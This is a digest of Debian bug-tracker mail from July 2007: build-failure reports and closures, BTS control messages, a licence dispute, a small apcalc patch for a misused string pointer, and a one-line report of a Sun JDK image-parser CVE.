Bug#427183: marked as done (classpath - FTBFS: error: ISO C++ forbids declaration of 'NS_DEFINE_IID' with no type)

2007-07-05 Thread Debian Bug Tracking System
Your message dated Thu, 05 Jul 2007 06:02:05 +
with message-id [EMAIL PROTECTED]
and subject line Bug#427183: fixed in classpath 2:0.95-1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: classpath
Version: 2:0.92-4
Severity: serious
User: [EMAIL PROTECTED]
Usertags: qa-ftbfs

hi,

while doing an archive wide package rebuild your package failed to build from
source for the following reason:

  gcjwebplugin.cc: At global scope:
  gcjwebplugin.cc:145: error: ISO C++ forbids declaration of 'NS_DEFINE_IID' 
  with no type
  gcjwebplugin.cc:145: error: 'kIPluginTagInfo2IID' was not declared in this 
  scope
  gcjwebplugin.cc:145: error: expected primary-expression before '{' token
  gcjwebplugin.cc:145: error: initializer expression list treated as compound 
  expression
  gcjwebplugin.cc: In function 'gchar* plugin_get_documentbase(NPP_t*)':
  gcjwebplugin.cc:874: error: 'nsresult' was not declared in this scope
  gcjwebplugin.cc:874: error: expected `;' before 'result'
  gcjwebplugin.cc:887: error: 'class nsIPluginInstance' has no member named 
  'GetPeer'
  gcjwebplugin.cc:896: error: 'result' was not declared in this scope
  gcjwebplugin.cc:896: error: 'class nsIPluginInstancePeer' has no member 
  named 'QueryInterface'
  gcjwebplugin.cc:896: error: 'kIPluginTagInfo2IID' was not declared in this 
  scope
  gcjwebplugin.cc:904: error: 'class nsIPluginTagInfo2' has no member named 
  'GetDocumentBase'
  gcjwebplugin.cc:916: error: 'NS_RELEASE' was not declared in this scope
  gcjwebplugin.cc: At global scope:
  gcjwebplugin.cc:145: warning: 'NS_DEFINE_IID' defined but not used
  make[3]: *** [libgcjwebplugin_la-gcjwebplugin.lo] Error 1
  make[3]: Leaving directory `/build/user/classpath-0.92/native/plugin'
  make[2]: *** [all-recursive] Error 1
  make[2]: Leaving directory `/build/user/classpath-0.92/native'
  make[1]: *** [all-recursive] Error 1
  make[1]: Leaving directory `/build/user/classpath-0.92'
  make: *** [build-stamp] Error 2

The Full Build log is available and can be viewed at:

 http://people.debian.org/~lucas/logs/2007/06/01/
 
bye,
- michael

---End Message---
---BeginMessage---
Source: classpath
Source-Version: 2:0.95-1

We believe that the bug you reported is fixed in the latest version of
classpath, which is due to be installed in the Debian FTP archive:

classpath-common-unzipped_0.95-1_all.deb
  to pool/main/c/classpath/classpath-common-unzipped_0.95-1_all.deb
classpath-common_0.95-1_all.deb
  to pool/main/c/classpath/classpath-common_0.95-1_all.deb
classpath-doc_0.95-1_all.deb
  to pool/main/c/classpath/classpath-doc_0.95-1_all.deb
classpath-gtkpeer_0.95-1_i386.deb
  to pool/main/c/classpath/classpath-gtkpeer_0.95-1_i386.deb
classpath-qtpeer_0.95-1_i386.deb
  to pool/main/c/classpath/classpath-qtpeer_0.95-1_i386.deb
classpath_0.95-1.diff.gz
  to pool/main/c/classpath/classpath_0.95-1.diff.gz
classpath_0.95-1.dsc
  to pool/main/c/classpath/classpath_0.95-1.dsc
classpath_0.95-1_i386.deb
  to pool/main/c/classpath/classpath_0.95-1_i386.deb
classpath_0.95.orig.tar.gz
  to pool/main/c/classpath/classpath_0.95.orig.tar.gz
gcjwebplugin_0.95-1_i386.deb
  to pool/main/c/classpath/gcjwebplugin_0.95-1_i386.deb
jikes-classpath_0.95-1_all.deb
  to pool/main/c/classpath/jikes-classpath_0.95-1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Michael Koch [EMAIL PROTECTED] (supplier of updated classpath package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Thu, 28 Jun 2007 07:05:44 +0200
Source: classpath
Binary: classpath-qtpeer classpath-gtkpeer gcjwebplugin classpath-doc 
classpath-common-unzipped classpath-common classpath jikes-classpath
Architecture: source all i386
Version: 2:0.95-1
Distribution: unstable
Urgency: low
Maintainer: Debian Java Maintainers [EMAIL PROTECTED]
Changed-By: Michael Koch [EMAIL PROTECTED]
Description: 
 classpath  - clean room standard Java libraries
 classpath-common - clean room standard Java libraries - architecture 
independent fil
 classpath-common-unzipped - clean room standard Java libraries - 

Bug#430866: apcalc: Dangling pointer for config

2007-07-05 Thread Martin Buck
tags 430866 - security
tags 430866 forwarded patch
severity important
thanks

On Wed, Jun 27, 2007 at 04:10:08PM -0400, Patricio Rojo wrote:
   I reported this bug as a security hole just because I found what it 
 seems to be a dangling pointer... I have no idea if it could be 
 maliciously exploted... so feel free to downgrade its severity if you 
 can certify otherwise.

Thanks for your report. I've had a look at the code in question. It treats
a struct string * as a char * when it actually should use the s_str
member of struct string (config.c:532 and config.c:545). But it's used
only in printf-style output and the function called (math_error()) protects
against buffer overflow, so I think the worst thing that could happen is
garbage output or under rare circumstances a segfault due to nonexistent
memory being read. I don't see any way to exploit this, so I'm downgrading
the severity.

Depending on how long upstream needs to release a fixed version, I'll
either wait for that or upload a new Debian version with the patch below.

Martin


--- apcalc-2.12.1.13/config.c.orig  2007-07-05 09:34:03.0 +0200
+++ apcalc-2.12.1.13/config.c   2007-07-05 09:49:47.0 +0200
@@ -529,7 +529,7 @@
}
temp = lookup_long(modes, vp-v_str-s_str);
if (temp  0) {
-   math_error(Unknown mode \%s\, vp-v_str);
+   math_error(Unknown mode \%s\, vp-v_str-s_str);
/*NOTREACHED*/
}
math_setmode((int) temp);
@@ -542,7 +542,7 @@
}
temp = lookup_long(modes, vp-v_str-s_str);
if (temp  0) {
-   math_error(Unknown mode \%s\, vp-v_str);
+   math_error(Unknown mode \%s\, vp-v_str-s_str);
/*NOTREACHED*/
}
math_setmode2((int) temp);



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431123: aptitude: Initializing package states takes very much longer than before +b1

2007-07-05 Thread Nathaniel Smith
On Tue, Jul 03, 2007 at 07:42:08AM -0700, Daniel Burrows wrote:
 On Mon, Jul 02, 2007 at 10:00:53PM -0700, Nathaniel Smith [EMAIL PROTECTED] 
 was heard to say:
  On Sun, Jul 01, 2007 at 06:12:11PM -0700, Daniel Burrows wrote:
 Does installing the version in experimental fix the problem for you?
  
  Yes, the aptitude in experimental (0.4.4-5~2, which appears to be
  linked against apt 0.6.46.4-0.1, which is no longer in unstable?)
  works fine.
 
   Eh?  I meant 0.4.5.3-1.  Maybe that's not available on your
 architecture?
   
   Anyway, I'm preparing an upload to unstable, which should fix these
 problems for everyone.

Ah, right, x86-64.  The version that went into unstable today seems to
be working fine.

-- Nathaniel

-- 
Of course, the entire effort is to put oneself
 Outside the ordinary range
 Of what are called statistics.
  -- Stephan Spender


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: tagging 431324, severity of 431411 is important, tagging 431199

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.4
 tags 431324 lenny sid
Bug#431324: apt-watch - FTBFS: undefined reference to 
`glade_xml_signal_autoconnect'
There were no tags set.
Tags added: lenny, sid

 severity 431411 important
Bug#431411: ivtv: FTBFS on mips
Severity set to `important' from `serious'

 tags 431199 lenny sid
Bug#431199: kwave - FTBFS: error: cannot allocate an object of abstract type 
'FlacDecoder'
There were no tags set.
Tags added: lenny, sid


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431794: marked as done (whichwayisup: CC-v3.0 licenses do not meet the DFSG)

2007-07-05 Thread Debian Bug Tracking System
Your message dated Thu, 5 Jul 2007 09:41:05 +0200 (CEST)
with message-id [EMAIL PROTECTED]
and subject line Bug#431794: whichwayisup: CC-v3.0 licenses do not meet the DFSG
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: whichwayisup
Version: 0.7.0-1
Severity: serious
Justification: Policy 2.2.1

Hi!

The debian/copyright file[1] of this package states, in part:

| All game content, sounds and graphics are licensed
| under Creative Commons 3.0 Attribution license
| ( http://creativecommons.org/licenses/by/3.0/ )

As I replied[2] to you on debian-legal and debian-devel, I don't think
that CC-v3.0 licenses meet the DFSG.
In that message I referred you to some past threads, among which
you can find a detailed analysis[3] of CC-by-sa-v3.0: most of the
issues found in CC-by-sa-v3.0 also apply to CC-by-v3.0.

Please, try and persuade upstream to relicense (or dual-license) the
game content under the same license as the game code, that is
to say the GNU GPL v2.
Or under some other clearly DFSG-free license, such as the Expat/MIT
license[4].


[1] 
http://packages.debian.org/changelogs/pool/main/w/whichwayisup/whichwayisup_0.7.0-1/whichwayisup.copyright
[2] http://lists.debian.org/debian-legal/2007/05/msg00195.html
[3] http://lists.debian.org/debian-legal/2007/03/msg00105.html
[4] http://www.jclark.com/xml/copying.txt

---End Message---
---BeginMessage---
Hi Francesco,

In my opinion CC-by and CC-by-sa meet the requirements to be DFSG-free. I know
it is a controversial issue, so I won't enter into that fight myself (IANAL).
I'm pretty sure the license text can be improved, as can also most of other
licenses be, but that doesn't make it not DFSG, I think the license grants all
the rights needed to be considered free.

Thanks a lot for your concern anyway, maybe you should try to ask ftpmasters
about it, as they're in fact the authoritative entity that really decide on
which licenses are valid or not in last instance. The package has gone
recently through the NEW queue and was approved, and it doesn't seem that it
just had slip through, as it was clearly announced in the ITP, in the
debian/copyright file, the debian-legal mailing list and to the ftpmasters in
advance, as well as in planet.



   

¡Descubre una nueva forma de obtener respuestas a tus preguntas!
Entra en Yahoo! Respuestas.
http://es.answers.yahoo.com/info/welcome
---End Message---


Processed (with 2 errors): Re: Bug#430866: apcalc: Dangling pointer for config

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 430866 - security
Bug#430866: apcalc: Dangling pointer for config
Tags were: security
Tags removed: security

 tags 430866 forwarded patch
Unknown tag/s: forwarded.
Recognized are: patch wontfix moreinfo unreproducible fixed potato woody sid 
help security upstream pending sarge sarge-ignore experimental d-i confirmed 
ipv6 lfs fixed-in-experimental fixed-upstream l10n etch etch-ignore lenny 
lenny-ignore.

Bug#430866: apcalc: Dangling pointer for config
There were no tags set.
Tags added: patch

 severity important
Unknown command or malformed arguments to command.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: [EMAIL PROTECTED]: Processed (with 2 errors): Re: Bug#430866: apcalc: Dangling pointer for config]

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 430866 upstream
Bug#430866: apcalc: Dangling pointer for config
Tags were: patch
Tags added: upstream

 severity 430866 important
Bug#430866: apcalc: Dangling pointer for config
Severity set to `important' from `grave'

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: tagging 423479

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.6
 tags 423479 + lenny sid
Bug#423479: slrnface segfaults in /usr/lib/libX11.so.6 after receiving first 
face
There were no tags set.
Tags added: lenny, sid


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#424025: marked as done (python-biopython: FTBFS: *** mxTextTools *** is either not installed or out of date.)

2007-07-05 Thread Debian Bug Tracking System
Your message dated Thu, 05 Jul 2007 09:32:05 +
with message-id [EMAIL PROTECTED]
and subject line Bug#424025: fixed in python-biopython 1.43-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: python-biopython
Severity: serious
Version: 1.43-1
Justification: policy violation

hi, 

Lucas has rebuild the archive on i386 and your package Failed to Build
from Source with the following error:

  running build_py
  *** mxTextTools *** is either not installed or out of date.
  
  This package is required for many Biopython features.  Please install
  it before you install Biopython.
  You can find mxTextTools at 
  http://www.egenix.com/files/python/eGenix-mx-Extensions.html.
  
  make: *** [build-python2.5] Error 255
 
the full log can be found here:

 
http://people.debian.org/~lucas/logs/2007/05/13/python-biopython_1.43-1_sid32.buildlog

bye,
- michael

---End Message---
---BeginMessage---
Source: python-biopython
Source-Version: 1.43-2

We believe that the bug you reported is fixed in the latest version of
python-biopython, which is due to be installed in the Debian FTP archive:

python-biopython-doc_1.43-2_all.deb
  to pool/main/p/python-biopython/python-biopython-doc_1.43-2_all.deb
python-biopython-martel_1.43-2_all.deb
  to pool/main/p/python-biopython/python-biopython-martel_1.43-2_all.deb
python-biopython-sql_1.43-2_all.deb
  to pool/main/p/python-biopython/python-biopython-sql_1.43-2_all.deb
python-biopython_1.43-2.diff.gz
  to pool/main/p/python-biopython/python-biopython_1.43-2.diff.gz
python-biopython_1.43-2.dsc
  to pool/main/p/python-biopython/python-biopython_1.43-2.dsc
python-biopython_1.43-2_i386.deb
  to pool/main/p/python-biopython/python-biopython_1.43-2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Philipp Benner [EMAIL PROTECTED] (supplier of updated python-biopython 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Thu, 14 Jun 2007 21:40:18 +0200
Source: python-biopython
Binary: python-biopython-martel python-biopython-sql python-biopython 
python-biopython-doc
Architecture: source all i386
Version: 1.43-2
Distribution: unstable
Urgency: low
Maintainer: Philipp Benner [EMAIL PROTECTED]
Changed-By: Philipp Benner [EMAIL PROTECTED]
Description: 
 python-biopython - Python library for bioinformatics
 python-biopython-doc - Documentation for the Biopython library
 python-biopython-martel - Flat file parser for the Biopython library
 python-biopython-sql - SQL support for the Biopython library
Closes: 424025
Changes: 
 python-biopython (1.43-2) unstable; urgency=low
 .
   * Rebuild for python-2.5 support (Closes: #424025).
Files: 
 1d1ad8e82f009bb00e05ce9afaab90dc 865 python optional 
python-biopython_1.43-2.dsc
 0dddef078c37d5ae8bf51cbd8650a5f9 3657 python optional 
python-biopython_1.43-2.diff.gz
 22513ef24b27c08d8b1aaf85503cd72a 2986366 doc optional 
python-biopython-doc_1.43-2_all.deb
 966017690fa45999b759ecf3b1f3ed91 15282 python optional 
python-biopython-sql_1.43-2_all.deb
 48f4a99d139c4beecf5b74ad50368d8d 59040 python optional 
python-biopython-martel_1.43-2_all.deb
 1854a54f878bedf30506758f8d50a4a6 936194 python optional 
python-biopython_1.43-2_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGjLeKYDBbMcCf01oRArgnAKDE0hbzqBBSnmvALsxWjXcE+XIZewCgpX5V
F58NT/iWASKqNQI65ukEAWk=
=JhmO
-END PGP SIGNATURE-

---End Message---


Bug#431831: sun-java5-jdk: Integer overflow in ICC profile parser allows execution of arbitrary code

2007-07-05 Thread Sam Morris
Package: sun-java5-jdk
Version: 1.5.0-10-3
Severity: grave
Tags: security
Justification: user security hole

Integer overflow in the embedded ICC profile image parser in Sun Java
Development Kit (JDK) before 1.5.0_11-b03, and 1.6.x before
1.6.0_01-b06, allows remote attackers to execute arbitrary code or cause
a denial of service (JVM crash) via a crafted JPEG or BMP file.

CVE-2007-2788

-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (540, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-4-686
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)

Versions of packages sun-java5-jre depends on:
ii  debconf [debconf-2.0]   1.5.11   Debian configuration management sy
ii  java-common 0.25 Base of all Java packages
ii  locales 2.3.6.ds1-13 GNU C Library: National Language (
ii  sun-java5-bin   1.5.0-10-3   Sun Java(TM) Runtime Environment (

Versions of packages sun-java5-jre recommends:
pn  gsfonts-x11   none (no description available)
ii  java-common   0.25   Base of all Java packages

-- debconf information:
* shared/accepted-sun-dlj-v1-1: true
  sun-java5-jre/jcepolicy:
  sun-java5-jre/stopthread: true
  shared/error-sun-dlj-v1-1:
* shared/present-sun-dlj-v1-1:


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#431826: system-tools-backends: shares-admin fails to detect samba and nfs

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 reassign 431826 libnet-dbus-perl
Bug#431826: system-tools-backends: shares-admin fails to detect samba and nfs
Bug reassigned from package `system-tools-backends' to `libnet-dbus-perl'.

 forcemerge #430186 431826
Bug#430186: Upgrading to dbus 1.1.1 breaks some gnome-system-tools.
Bug#431826: system-tools-backends: shares-admin fails to detect samba and nfs
Bug#430202: network-admin doesn't recognize connection
Bug#430485: gnome-system-tools: *admin fail to start with new dbus
Bug#430657: users-admin shows no users and no groups
Bug#430669: gnome-system-tools: services-admin shows no services to 
activiate/deactivate
Forcibly Merged 430186 430202 430485 430657 430669 431826.

 stop
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431837: hal fails to configure in buildd chroots

2007-07-05 Thread Andreas Barth
Package: hal
Version: 0.5.9.1-1
Severity: grave

Hi,

hal fails to configure correctly inside of buildd chroots, see e.g.
http://buildd.debian.org/fetch.cgi?pkg=uimver=1%3A1.4.1-4arch=i386stamp=1182471498file=log

Setting up hal (0.5.9.1-1) ...
chage: the shadow password file is not present
/usr/bin/chage failed with return code 15, shadow not enabled, password
aging cannot be set. Continuing.
Reloading system message bus config...done.
Starting Hardware abstraction layer: haldinvoke-rc.d: initscript hal,
action start failed.


Cheers,
Andi
-- 
  http://home.arcor.de/andreas-barth/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#427260: marked as done (am-utils: FTBFS: error: cannot find UTS_RELEASE in linux/version.h)

2007-07-05 Thread Debian Bug Tracking System
Your message dated Thu, 05 Jul 2007 11:02:03 +
with message-id [EMAIL PROTECTED]
and subject line Bug#427260: fixed in am-utils 6.1.5-6
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: am-utils
version: 6.1.5-5
Severity: serious
Justification: FTBFS on i386

Hi,

During a rebuild of all packages in sid, your package failed to build on i386.

Relevant part:
appending configuration tag CXX to libtool
checking for ld used by g++... /usr/bin/ld
checking if the linker (/usr/bin/ld) is GNU ld... yes
checking whether the g++ linker (/usr/bin/ld) supports shared libraries... yes
checking for g++ option to produce PIC... -fPIC
checking if g++ PIC flag -fPIC works... yes
checking if g++ supports -c -o file.o... yes
checking whether the g++ linker (/usr/bin/ld) supports shared libraries... yes
checking dynamic linker characteristics... GNU/Linux ld.so
checking how to hardcode library paths into programs... immediate
checking whether stripping libraries is possible... yes
appending configuration tag F77 to libtool
configure: *** EXTRA OPTION PROCESSING ***
checking additional preprocessor flags... 
checking additional compiler flags... 
checking additional linker flags... 
configure: *** UNIX VARIANTS ***
checking host headers version... 
configure: error: cannot find UTS_RELEASE in linux/version.h.
  This Linux system may be misconfigured or unconfigured!
make: *** [build-stamp] Error 1

The full build log is available from
http://people.debian.org/~lucas/logs/2007/05/22/

About the archive rebuild: The rebuild was done on about 50 AMD64 nodes
of the Grid'5000 platform, using a clean chroot containing a sid i386
environment.  Internet was not accessible from the build systems.
-- 
Lucas Nussbaum

-- 
| Lucas Nussbaum
| [EMAIL PROTECTED]   http://www.lucas-nussbaum.net/ |
| jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F |

---End Message---
---BeginMessage---
Source: am-utils
Source-Version: 6.1.5-6

We believe that the bug you reported is fixed in the latest version of
am-utils, which is due to be installed in the Debian FTP archive:

am-utils-doc_6.1.5-6_all.deb
  to pool/main/a/am-utils/am-utils-doc_6.1.5-6_all.deb
am-utils_6.1.5-6.diff.gz
  to pool/main/a/am-utils/am-utils_6.1.5-6.diff.gz
am-utils_6.1.5-6.dsc
  to pool/main/a/am-utils/am-utils_6.1.5-6.dsc
am-utils_6.1.5-6_powerpc.deb
  to pool/main/a/am-utils/am-utils_6.1.5-6_powerpc.deb
libamu-dev_6.1.5-6_powerpc.deb
  to pool/main/a/am-utils/libamu-dev_6.1.5-6_powerpc.deb
libamu4_6.1.5-6_powerpc.deb
  to pool/main/a/am-utils/libamu4_6.1.5-6_powerpc.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Tim Cutts [EMAIL PROTECTED] (supplier of updated am-utils package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Wed, 20 Jun 2007 18:12:53 +0100
Source: am-utils
Binary: am-utils libamu-dev libamu4 am-utils-doc
Architecture: source all powerpc
Version: 6.1.5-6
Distribution: unstable
Urgency: low
Maintainer: Tim Cutts [EMAIL PROTECTED]
Changed-By: Tim Cutts [EMAIL PROTECTED]
Description: 
 am-utils   - automounter utilities from 4.4BSD (includes amd)
 am-utils-doc - automounter utilities documentation
 libamu-dev - Support library for amd the 4.4BSD automounter (development)
 libamu4- Support library for amd the 4.4BSD automounter (runtime)
Closes: 422415 427260
Changes: 
 am-utils (6.1.5-6) unstable; urgency=low
 .
   * Enabled autofs support (nfs remains the default)
   * init script modified to try to be more thorough when shutting down amd
 especially when using autofs as the mount method.
   * Added Italian debconf translation (Closes: #422415).
   * Added build dependency on linux-kernel-headers, and backported autoconf
 change for kernel version from 6.1.6 CVS prerelease (Closes: #427260).
Files: 
 534a30444d9ba4e6360ec0670cc41d41 1077 net extra am-utils_6.1.5-6.dsc
 bd5184b2a343051b78748b155b3be30c 71526 net extra am-utils_6.1.5-6.diff.gz
 ed6189fcce209d124d6c45df4a61f144 663280 doc extra am-utils-doc_6.1.5-6_all.deb
 1b0e3e38c4ceefe632abbcf94f3d6ee0 418218 net extra 

Bug#431831: sun-java5-jdk: Integer overflow in ICC profile parser allows execution of arbitrary code

2007-07-05 Thread Matthias Klose
tags 431831 + pending
thanks

when do people start checking the NEW queue before filing bogus reports?

Sam Morris schrieb:
 Package: sun-java5-jdk
 Version: 1.5.0-10-3
 Severity: grave
 Tags: security
 Justification: user security hole
 
 Integer overflow in the embedded ICC profile image parser in Sun Java
 Development Kit (JDK) before 1.5.0_11-b03, and 1.6.x before
 1.6.0_01-b06, allows remote attackers to execute arbitrary code or cause
 a denial of service (JVM crash) via a crafted JPEG or BMP file.
 
 CVE-2007-2788



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431831: sun-java5-jdk: Integer overflow in ICC profile parser allows execution of arbitrary code

2007-07-05 Thread Sam Morris
On Thu, 2007-07-05 at 13:05 +0200, Matthias Klose wrote:
 tags 431831 + pending
 thanks
 
 when do people start checking the NEW queue before filing bogus reports?

I wasn't aware that security updates for stable generally went through
NEW. Furthermore, the only entry that I see there for Sun's Java has
'unstable' for the distribution, not 'stable-security' or whatever dist
it is that security updates get.

-- 
Sam Morris [EMAIL PROTECTED]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431843: FTBFS: ghc-6.6.1: not built for interactive use

2007-07-05 Thread Marc 'HE' Brockschmidt
Package: washngo
Version: 2.10-1
Severity: serious

Heya,

washngo fails to build on all architectures:
| /usr/bin/make haddock
| make[1]: Entering directory `/build/buildd/washngo-2.10'
| ./Setup.lhs haddock 
| ghc-6.6.1: not built for interactive use
| make[1]: *** [haddock] Error 1
| make[1]: Leaving directory `/build/buildd/washngo-2.10'
| make: *** [install] Error 2

This is currently one of the packages blocking the ghc6 transition.

Marc


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: tagging 242866

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.4
 tags 242866 - etch
Bug#242866: drivers containing firmware blobs
Tags were: upstream sid d-i etch help etch-ignore sarge-ignore
Bug#243022: ymfpci_image.h: Sourceless microcode without permission to 
redistribute
Bug#383403: linux-2.6: includes nondistributable and non-free binary firmware
Bug#412950: linux-2.6: [legal] the current kernel tarball doesn't respect the 
GR 2006-007
Tags removed: etch


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: tagging 242866

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.4
 tags 242866 - sid
Bug#242866: drivers containing firmware blobs
Tags were: upstream sid d-i help etch-ignore sarge-ignore
Bug#243022: ymfpci_image.h: Sourceless microcode without permission to 
redistribute
Bug#383403: linux-2.6: includes nondistributable and non-free binary firmware
Bug#412950: linux-2.6: [legal] the current kernel tarball doesn't respect the 
GR 2006-007
Tags removed: sid


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: tagging 423040

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.4
 tags 423040 lenny
Bug#423040: Source package contains non-free IETF RFC/I-D
There were no tags set.
Tags added: lenny


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: found 431751 in 2.6.21-1

2007-07-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.6
 found 431751 2.6.21-1
Bug#431751: ipw3945.ko missing from ipw3945-modules package on 686.
Bug#430646: ipw3945-modules-2.6.21-1-686: module missing from package
Bug#430904: ipw3945-modules-2.6.21-1-amd64: no module shipped in package
Bug marked as found in version 2.6.21-1.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#431736: git-core_1:1.5.3~rc0-1(hppa/experimental): FTBFS: test failure in git-svn tests

2007-07-05 Thread Gerrit Pape
On Wed, Jul 04, 2007 at 05:16:30PM +0200, Frank Lichtenheld wrote:
 your package failed to build from source. Some new test failures this
 time. Unstable seems to be affected as well.

Yes, the workaround to use -O0 on hppa did help a bit; now, I'm nearly
sure, it's subversion that fails in git's selftests, and that's still
bug#427398.

Regards, Gerrit.


 | Automatic build of git-core_1:1.5.3~rc0-1 on meitner by sbuild/hppa 98-farm
 | Build started at 20070704-1526
 | 
 **
 | Checking available source versions...
 | Fetching source files...
 | Reading package lists...
 | Building dependency tree...
 | Need to get 1626kB of source archives.
 | Get:1 http://ftp.de.debian.org experimental/main git-core 1:1.5.3~rc0-1 
